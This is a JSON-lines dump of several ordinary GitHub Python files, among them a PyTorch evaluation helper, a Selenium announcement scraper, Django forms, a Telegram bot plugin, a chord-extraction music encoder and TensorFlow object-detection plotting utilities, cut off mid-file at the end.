"github-code", "pt": "53", "api": [{"api_name": "facemash.models.FaceMash.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 11, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 12, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 13, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 29, "usage_type": "name"}, {"api_name": "facemash.models.FaceMash.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 30, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 45, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 45, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 46, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 48, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 49, "usage_type": "call"}, {"api_name": "math.log", "line_number": 57, "usage_type": "call"}, {"api_name": "math.e", "line_number": 57, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 58, "usage_type": "call"}, {"api_name": "math.e", "line_number": 58, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 66, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 67, "usage_type": "call"}, {"api_name": "math.log", "line_number": 77, "usage_type": "call"}, {"api_name": "math.e", "line_number": 77, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 105, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 107, "usage_type": "call"}, {"api_name": "math.log", "line_number": 111, "usage_type": "call"}, {"api_name": "math.e", "line_number": 111, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 137, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 166, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.DoesNotExist", "line_number": 167, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 167, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 168, "usage_type": "name"}, {"api_name": "facemash.models.FaceMash.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 174, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "29400977666", "text": "import context\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.utils.data\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom typing import Optional, Tuple\n\n\ndef eval_logits_on_dataset(model: nn.Module, dataset: Dataset, batch_size: int = 128,\n device: Optional[torch.device] = None,\n num_workers: int = 4) -> Tuple[torch.tensor, torch.tensor]:\n \"\"\"\n Takes a model and an evaluation dataset, and returns the logits\n output by the model on that dataset as an array\n :param model: torch.nn.Module that outputs model logits\n :param dataset: pytorch dataset with inputs and labels\n :param batch_size: int\n :param device: device to use for evaluation\n :param num_workers: int, num. workers for the data loader\n :return: stacked torch tensor of logits returned by the model\n on that dataset, and the labels\n \"\"\"\n # Set model in eval mode\n model.eval()\n\n testloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=num_workers)\n logits_list = []\n labels_list = []\n with torch.no_grad():\n for i, data in enumerate(testloader, 0):\n # Get inputs\n inputs, labels = data\n if device is not None:\n inputs, labels = map(lambda x: x.to(device),\n (inputs, labels))\n logits = model(inputs)\n logits_list.append(logits)\n labels_list.append(labels)\n\n logits = torch.cat(logits_list, dim=0)\n labels = torch.cat(labels_list, dim=0)\n return logits.cpu(), labels.cpu()\n", "repo_name": "KaosEngineer/PriorNetworks", "sub_path": "prior_networks/evaluation.py", "file_name": "evaluation.py", "file_ext": "py", "file_size_in_byte": 1657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 13, "usage_type": "attribute"}]} +{"seq_id": "38919389340", "text": "from time import sleep\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\r\nfrom selenium.webdriver.common.by import By\r\n\r\nfrom helpers.file_manager import FileManager\r\nfrom helpers.file_manager import FILE_PATH\r\n\r\nimport csv\r\nimport random\r\n\r\nclass UtScrapper():\r\n def __init__(self) -> None:\r\n self.ff_options = FirefoxOptions()\r\n self.ff_options.headless = True\r\n self.driver = webdriver.Firefox(options=self.ff_options)\r\n\r\n self.fm = FileManager()\r\n self.fm.check_file()\r\n\r\n async def scrape_ut(self, weburl):\r\n self.driver.get(weburl)\r\n\r\n try:\r\n existent_elements = list(csv.DictReader(open('./data/ut_scrapper.csv', 'r')))\r\n new_element_list = []\r\n\r\n for e in range(10, 0, -1):\r\n element = self.driver.find_element(By.CSS_SELECTOR, 'div.alert-sm:nth-child({})'.format(e))\r\n e_text = str(element.text).split(' ')\r\n e_title = ''\r\n e_date = e_text[0]\r\n e_link = self.driver.find_element(By.CSS_SELECTOR, 'div.alert-sm:nth-child({}) > strong > a'.format(e)).get_attribute('href')\r\n e_flag = False\r\n \r\n for i in range(1,len(e_text)):\r\n if i == 1:\r\n e_title = e_title + e_text[i]\r\n else:\r\n e_title = e_title + ' ' + e_text[i]\r\n \r\n for row in existent_elements:\r\n if row['title'] == e_title and row['date'] == e_date:\r\n e_flag = True\r\n break\r\n\r\n if e_flag == True:\r\n print(\"Element already in file\")\r\n else:\r\n self.fm.write_file(title=e_title, date=e_date, link=e_link)\r\n new_element = {'title': e_title, 'date': e_date, 'link': e_link}\r\n new_element_list.append(new_element)\r\n print(\"---->New element added to the file\")\r\n\r\n print (\"The file has been saved\")\r\n sleep(random.randint(4, 13))\r\n self.driver.close()\r\n return(new_element_list)\r\n\r\n except:\r\n print (\"Element not found\")\r\n sleep(random.randint(4, 13))\r\n self.driver.close()", "repo_name": "Socterean/UT-bot4445", "sub_path": "helpers/ut_scrapper.py", "file_name": "ut_scrapper.py", "file_ext": "py", "file_size_in_byte": 2391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.firefox.options.Options", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 16, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 16, "usage_type": "name"}, {"api_name": "helpers.file_manager.FileManager", "line_number": 18, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 62, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "36617698954", "text": "import numpy as np\nfrom skimage.measure import block_reduce\n\ndef crop_and_resize(img, target_size=32, zoom=1):\n small_side = int(np.min(img.shape) * zoom)\n reduce_factor = int(small_side / target_size)\n #print(reduce_factor)\n crop_size = target_size * reduce_factor\n mid = np.array(img.shape) // 2\n mid = mid.astype(np.int)\n half_crop = int(crop_size // 2)\n #print(half_crop)\n #half_crop = half_crop.astype(np.int)\n center = img[mid[0]-half_crop:mid[0]+half_crop,\n \tmid[1]-half_crop:mid[1]+half_crop]\n return block_reduce(center, (reduce_factor, reduce_factor), np.mean)\n", "repo_name": "sayands/deep-learning-projects", "sub_path": "SMILE-CNN/utils/crop_and_resize.py", "file_name": "crop_and_resize.py", "file_ext": "py", "file_size_in_byte": 607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.min", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 10, "usage_type": "attribute"}, {"api_name": "skimage.measure.block_reduce", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "12937801107", "text": "import os\n\nfrom babel import Locale\nfrom pyrogram.enums import ChatType\nfrom pyrogram.types import Message\n\nfrom ..bot import Client\nfrom ..database.chats import add_chat, get_chat\n\nLanguages: list[str] = [] # Loaded Locales\n\nfor file in os.listdir(\"twittergram/locales\"):\n if file not in (\"__init__.py\", \"__pycache__\"):\n Languages.append(file.replace(\".yaml\", \"\"))\n\n\n# This is the first plugin run to guarantee\n# that the actual chat is initialized in the DB.\n@Client.on_message(group=-1)\nasync def check_chat(client: Client, message: Message):\n chat = message.chat\n user = message.from_user\n\n try:\n language_code = str(Locale.parse(user.language_code, sep=\"-\"))\n except (AttributeError, TypeError):\n language_code: str = \"en_US\"\n\n if language_code not in Languages:\n language_code: str = \"en-us\"\n\n if user and await get_chat(user.id, ChatType.PRIVATE) is None:\n await add_chat(user.id, language_code, ChatType.PRIVATE)\n\n if await get_chat(chat.id, chat.type) is None:\n await add_chat(chat.id, language_code, chat.type)\n", "repo_name": "ruizlenato/twittergram", "sub_path": "twittergram/plugins/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1088, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "bot.Client", "line_number": 20, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 20, "usage_type": "name"}, {"api_name": "babel.Locale.parse", "line_number": 25, "usage_type": "call"}, {"api_name": "babel.Locale", "line_number": 25, "usage_type": "name"}, {"api_name": "database.chats.get_chat", "line_number": 32, "usage_type": "call"}, {"api_name": "pyrogram.enums.ChatType.PRIVATE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pyrogram.enums.ChatType", "line_number": 32, "usage_type": "name"}, {"api_name": "database.chats.add_chat", "line_number": 33, "usage_type": "call"}, {"api_name": "pyrogram.enums.ChatType.PRIVATE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pyrogram.enums.ChatType", "line_number": 33, "usage_type": "name"}, {"api_name": "database.chats.get_chat", "line_number": 35, "usage_type": "call"}, {"api_name": "database.chats.add_chat", "line_number": 36, "usage_type": "call"}, {"api_name": "bot.Client.on_message", "line_number": 19, "usage_type": "call"}, {"api_name": "bot.Client", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "12394356549", "text": "from django import forms\nfrom home.models import Book,Author,Genre\n\n\nclass BookForms(forms.Form):\n class Meta:\n book=Book\n fields=('name','genre','purchase_date','author')\n \n title=forms.ModelChoiceField(\n queryset=Book.objects.all(),\n empty_label='Title',widget=forms.Select(attrs={'name':'book','id':'book',\n 'class':'custom-select'})\n )\n\n author=forms.ModelChoiceField(\n queryset=Author.objects.all(),\n empty_label='Author',widget=forms.Select(attrs={'name':'author','id':'author',\n 'class':'custom-select'})\n )\n purchase_date = forms.DateField(label='',widget=forms.DateInput(\n attrs={'placeholder':'Purchase_Date','name':'date','id':'date','class':'form-control'}))\n \n\n genre=forms.ModelMultipleChoiceField(queryset=Genre.objects.all(), widget=forms.CheckboxSelectMultiple)\n\nclass SearchForm(forms.Form):\n q=forms.CharField(label='',\n widget=forms.TextInput(attrs={'placeholder':'search','maxlength':'30',\n 'class':'form-control'}))\n", "repo_name": "dikshaRaj/Diksha", "sub_path": "home/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1053, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "home.models.Book", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "home.models.Book.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "home.models.Book.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "home.models.Book", "line_number": 11, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.ModelChoiceField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "home.models.Author.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "home.models.Author.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "home.models.Author", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.Select", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 21, "usage_type": "call"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 25, "usage_type": "name"}, {"api_name": "home.models.Genre.objects.all", "line_number": 25, "usage_type": "call"}, {"api_name": "home.models.Genre.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "home.models.Genre", "line_number": 25, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.forms.Form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "14544952438", "text": "import contextlib\nimport json\nimport os\nimport numpy as np\nfrom numba.core.errors import NumbaDeprecationWarning\nimport warnings\n\nfrom midi import Midi\nfrom constants import VAMP_PATH, CHORD_ENCODINGS_PATH\n\nos.environ[\"VAMP_PATH\"] = VAMP_PATH\nwarnings.filterwarnings(\"ignore\", category=NumbaDeprecationWarning)\n\nfrom chord_extractor.extractors import Chordino # noqa\n\n\nclass Style:\n encoding_type = \"style\"\n\n def __init__(self, midi: Midi):\n self.midi = midi\n\n # File that stores encodings of chords based on vocabulary\n if not os.path.exists(CHORD_ENCODINGS_PATH):\n with open(CHORD_ENCODINGS_PATH, \"w\") as f:\n json.dump([1, {\"N\": 0}], f)\n\n with open(CHORD_ENCODINGS_PATH, \"r\") as f:\n self.num_chords, self.vocab = json.load(f)\n\n # Silence output from Chordino\n with open(os.devnull, \"w\") as devnull:\n with contextlib.redirect_stdout(devnull):\n self.extract_style()\n self.generate_encoding()\n\n def extract_style(self):\n chordino = Chordino()\n conversion_file_path = chordino.preprocess(self.midi.filepath)\n\n chords = chordino.extract(conversion_file_path)\n self.chords = [(c.chord, c.timestamp) for c in chords]\n\n def generate_encoding(self):\n # One hot encodes all chords in the midi\n self.encoding = np.zeros((self.midi.piano_roll.shape[1], self.num_chords))\n\n for (chord, t1), (chord, t2) in zip(self.chords, self.chords[1:]):\n if chord not in self.vocab:\n self.vocab[chord] = self.num_chords\n self.num_chords += 1\n\n self.encoding = np.hstack(\n (self.encoding, np.zeros((self.encoding.shape[0], 1)))\n )\n\n start = self.midi.time_to_tick(t1)\n end = self.midi.time_to_tick(t2)\n index = self.vocab[chord]\n\n self.encoding[start:end, index] = 1\n\n with open(CHORD_ENCODINGS_PATH, \"w\") as f:\n json.dump([self.num_chords, self.vocab], f)\n", "repo_name": "VikaasVarma/Music-Style-Transfer", "sub_path": "embeddings/style.py", "file_name": "style.py", "file_ext": "py", "file_size_in_byte": 2066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "constants.VAMP_PATH", "line_number": 11, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 12, "usage_type": "call"}, {"api_name": "numba.core.errors.NumbaDeprecationWarning", "line_number": 12, "usage_type": "name"}, {"api_name": "midi.Midi", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 24, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 25, "usage_type": "argument"}, {"api_name": "json.dump", "line_number": 26, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 28, "usage_type": "argument"}, {"api_name": "json.load", "line_number": 29, "usage_type": "call"}, {"api_name": "os.devnull", "line_number": 32, "usage_type": "attribute"}, {"api_name": "contextlib.redirect_stdout", "line_number": 33, "usage_type": "call"}, {"api_name": "chord_extractor.extractors.Chordino", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 63, "usage_type": "argument"}, {"api_name": "json.dump", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "22116161809", "text": "import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport json\nfrom six import BytesIO\nfrom PIL import Image\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matplotlib.patches import Ellipse, Rectangle\nfrom object_detection.utils import visualization_utils as viz_utils\n\n\ndef load_json_images_annotations(filename: str, label_dict: dict, subdir: str = \".\"):\n \"\"\"\n Extract the list of images, ground truth annotations, and their corresponding classes from a\n single json annotation file.\n NOTE: this function expects json files created with the VIA (VGG Image Annotator) tool.\n\n :param filename: str\n The name of the input list file\n :param label_dict: dict\n A dictionary with the class names and integer classes (starting with 1) as key-value pairs,\n e.g.: {'apple': 1, 'orange': 2, 'pear': 3}\n :param subdir: str\n The name of the subdirectory containing the images referred to in the annotation file.\n :return: (list of str, list of np.ndarray, list of np.ndarray)\n The lists of images, annotations, and labels.\n \"\"\"\n\n with open(filename) as f:\n annotations = json.load(f)\n\n image_list = []\n box_list = []\n label_list = []\n\n for ii, entry in enumerate(annotations.values()):\n\n image_file = entry['filename']\n image_file = os.path.join(subdir, image_file)\n # print(image_file)\n image_list.append(image_file)\n # get image size:\n with Image.open(image_file) as im:\n img_width, img_height = im.size\n\n boxes = []\n labels = []\n for region in entry['regions']:\n assert region['shape_attributes']['name'] == 'rect'\n # read rectangle parameters:\n x = region['shape_attributes']['x']\n y = region['shape_attributes']['y']\n width = region['shape_attributes']['width']\n height = region['shape_attributes']['height']\n # read class label:\n label = region['region_attributes']['class']\n\n xmin = x / img_width\n ymin = y / img_height\n xmax = (x + width) / img_width\n ymax = (y + height) / img_height\n\n boxes.append([ymin, xmin, ymax, xmax])\n labels.append(label_dict[label])\n\n box_list.append(np.array(boxes, dtype=np.float32))\n label_list.append(np.array(labels, dtype=np.int32))\n\n return image_list, box_list, label_list\n\n\ndef load_json_images_annotations_from_list(filename: str, label_dict: dict, subdir: str = \".\",\n annot_suffix: str = \".json\"):\n \"\"\"\n Extract the list of images, ground truth annotations, and their corresponding classes from a\n list of image files and corresponding json annotation files.\n NOTE: this function expects json files created with the VIA (VGG Image Annotator) tool.\n\n :param filename: str\n The name of the input list file\n :param label_dict: dict\n A dictionary with the class names and integer classes (starting with 1) as key-value pairs,\n e.g.: {'apple': 1, 'orange': 2, 'pear': 3}\n :param subdir: str\n The name of the subdirectory containing the images and the corresponding annotation files.\n :param annot_suffix: str\n The suffix of the annotation files such as: image_file='example.jpeg' -> annotation_file='example'\n :return: (list of str, list of np.ndarray, list of np.ndarray)\n The lists of images, annotations, and labels.\n \"\"\"\n\n with open(filename) as f:\n files = np.loadtxt(f, dtype='str')\n\n image_list = []\n annot_list = []\n label_list = []\n\n for ii, image_file in enumerate(files):\n\n image_list.append(os.path.join(subdir, image_file))\n\n annot_file = image_file.strip('.jpg').strip('.jpeg').strip('.png') + annot_suffix\n with open(os.path.join(subdir, annot_file)) as af:\n annotations = json.load(af)\n\n # skip uppermost dict level with only one entry:\n annotations = list(annotations.values())[0]\n\n assert annotations['filename'] == image_file, \"Image filename `{}` differs from annotation file attribute `{}`\" \\\n .format(image_file, annotations['filename'])\n\n annot = []\n labels = []\n for region in annotations['regions']:\n\n assert region['shape_attributes']['name'] == 'rect' or region['shape_attributes']['name'] == 'ellipse'\n\n if region['shape_attributes']['name'] == 'rect':\n # read rectangle parameters:\n x = region['shape_attributes']['x']\n y = region['shape_attributes']['y']\n w = region['shape_attributes']['width']\n h = region['shape_attributes']['height']\n rx = w / 2.\n ry = h / 2.\n cx = x + rx\n cy = y + ry\n theta = 0.\n # read class label:\n label = region['region_attributes']['class']\n\n # overwrite ellipse entry to rectangle entry in json:\n region['shape_attributes'] = \\\n {'name': 'ellipse', 'cx': round(cx), 'cy': round(cy), 'rx': rx, 'ry': ry, 'theta': theta}\n\n else:\n # read ellipse parameters:\n cx = region['shape_attributes']['cx']\n cy = region['shape_attributes']['cy']\n rx = region['shape_attributes']['rx']\n ry = region['shape_attributes']['ry']\n theta = region['shape_attributes']['theta']\n # read class label:\n label = region['region_attributes']['class']\n\n annot.append([cx, cy, rx, ry, theta])\n labels.append(label_dict[label])\n\n annot_list.append(np.array(annot, dtype=np.float32))\n label_list.append(np.array(labels, dtype=np.int32))\n\n return image_list, annot_list, label_list\n\n\ndef load_image_into_numpy_array(filename):\n \"\"\"\n Load an image from file into a numpy array of shape\n (height, width, channels), where channels=3 for RGB.\n\n :param filename: str\n Path to th input file.\n :return: numpy.ndarray, uint8\n The array with the input image.\n \"\"\"\n img_data = tf.io.gfile.GFile(filename, 'rb').read()\n image = Image.open(BytesIO(img_data))\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\ndef plot_detections(image_np, boxes, classes, scores, category_index, min_score_thresh=0.8, image_name=None):\n \"\"\"\n Wrapper function for the object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array()\n method.\n\n :param image_np: numpy.ndarray, uint8\n Array with the input image with shape (height, width, 3).\n :param boxes: numpy.ndarray\n Array with the bounding box parameters of shape (n_objects, 4).\n :param classes: numpy.ndarray\n Array with the class labels of shape (n_objects, ).\n Indices must be 1-based, and must match the keys in `category_index`.\n :param scores: numpy.ndarray\n Array with the detection scores. If None, groundtruth boxes are assumed,\n and all boxes will be plotted as black with neither classes nor scores.\n :param category_index: dict\n Dictionary of category dictionaries (each holding a category index `id` and category name `name`)\n keyed by category indices.\n :param min_score_thresh: float\n The minimum required score for a box to be shown.\n :param image_name: str\n Name of the output image file.\n \"\"\"\n\n image_np_annotated = image_np.copy()\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, boxes, classes, scores, category_index,\n use_normalized_coordinates=True, min_score_thresh=min_score_thresh)\n if image_name is not None:\n plt.imsave(image_name, image_np_annotated)\n else:\n plt.imshow(image_np_annotated)\n\n\ndef plot_images_with_boxes(images, gt_boxes, gt_labels,\n pred_boxes, pred_labels, pred_scores,\n category_index, label_id_offset,\n figname='image_list_with_boxes', figformat='jpg',\n min_score_thresh=0.5,\n max_boxes_to_draw=20,\n skip_scores=False, skip_labels=False):\n \"\"\"\n Plot a list / batch of images with the ground truth and\n (optionally) predicted boxes (with labels and scores) overlaid.\n\n :param images: array-like with tf.Tensor elements of shape (height, width, channels)\n OR tf.Tensor with batch dimension of shape (batch_size, height, width, channels)\n The list or batch of image tensors to be plotted.\n :param gt_boxes: array-like with tf.Tensor elements of shape (n_boxes, 4)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, 4)\n The list or batch of ground truth boxes to be plotted.\n :param gt_labels: array-like with tf.Tensor elements of shape (n_boxes, n_classes) or (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, n_classes) or (batch_size, n_boxes)\n The list or batch of ground truth labels.\n :param pred_boxes: array-like with tf.Tensor elements of shape (n_boxes, 4)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, 4)\n OR None\n The list or batch of predicted boxes to be plotted. If None, only the ground truth boxes will be plotted.\n :param pred_labels: array-like with tf.Tensor elements of shape (n_boxes, n_classes) or (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, n_classes) or (batch_size, n_boxes)\n OR None\n The list or batch of predicted labels. If None, only the ground truth boxes will be plotted.\n :param pred_scores: array-like with tf.Tensor elements of shape (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes)\n OR None\n The list or batch of prediction scores. If None, only the ground truth boxes will be plotted.\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :param figname: str\n The path and name of the output figure.\n :param figformat: str\n File format of the output figure. Only valid pyplot output formats are allowed.\n :param min_score_thresh: float\n The minimum detection score threshold for a predicted object to be plotted.\n :param max_boxes_to_draw: int OR None\n The maximum number of detection boxes to be plotted. If None, draw all boxes.\n :param skip_scores: boolean\n Whether to skip the drawing of bounding boxes.\n :param skip_labels: boolean\n Whether to skip score when drawing a single detection.\n :return:\n \"\"\"\n\n n_img = len(images)\n image_shape = tf.shape(images[0]).numpy()\n scaler = MinMaxScaler(feature_range=(0, 255))\n\n ncols = 3\n nrows = int(np.ceil(n_img / ncols))\n if nrows == 1:\n ncols = n_img\n fig = plt.figure(figsize=(ncols * 10, 10 * nrows))\n for ii in range(n_img):\n\n plt.subplot(nrows, ncols, ii + 1)\n\n image_np = scaler.fit_transform(images[ii].numpy().reshape(-1, 1)). \\\n reshape(image_shape).astype('int32')\n\n gt_boxes_np = gt_boxes[ii].numpy()\n\n # check if ground truth labels are one-hot encoded:\n if tf.shape(gt_labels[0]).numpy().shape[0] > 1:\n gt_labels_np = tf.argmax(gt_labels[ii], axis=1).numpy().flatten().astype('int32')\n else:\n gt_labels_np = gt_labels[ii].numpy().astype('int32')\n\n image_np_annotated = image_np.copy()\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, gt_boxes_np, gt_labels_np + label_id_offset, None, category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=max_boxes_to_draw, groundtruth_box_visualization_color='black', line_thickness=1)\n\n if None not in (pred_boxes, pred_labels, pred_scores):\n\n pred_boxes_np = pred_boxes[ii].numpy()\n\n # check if predicted labels are one-hot encoded:\n if tf.shape(pred_labels[0]).numpy().shape[0] > 1:\n pred_labels_np = tf.argmax(pred_labels[ii], axis=1).numpy().flatten().astype('int32')\n else:\n pred_labels_np = pred_labels[ii].numpy().astype('int32')\n\n pred_scores_np = pred_scores[ii].numpy()\n\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, pred_boxes_np, pred_labels_np + label_id_offset, pred_scores_np, category_index,\n use_normalized_coordinates=True, min_score_thresh=min_score_thresh,\n max_boxes_to_draw=max_boxes_to_draw, line_thickness=1,\n skip_scores=skip_scores, skip_labels=skip_labels)\n\n plt.imshow(image_np_annotated)\n\n plt.tight_layout()\n plt.savefig(figname + '.' + figformat, format=figformat)\n fig.clf()\n plt.close(fig)\n del fig\n\n\ndef plot_image_batch_with_boxes(dataset,\n category_index,\n label_id_offset,\n rescale: bool = True,\n figname: str = 'image_batch_with_boxes',\n figformat: str = 'jpg'):\n \"\"\"\n Plots a batch of images with their corresponding object bounding boxes and labels.\n\n :param dataset: tf.Dataset\n A batched tensorflow dataset object containing the entries:\n image, image shape, boxes, labels\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :param rescale: 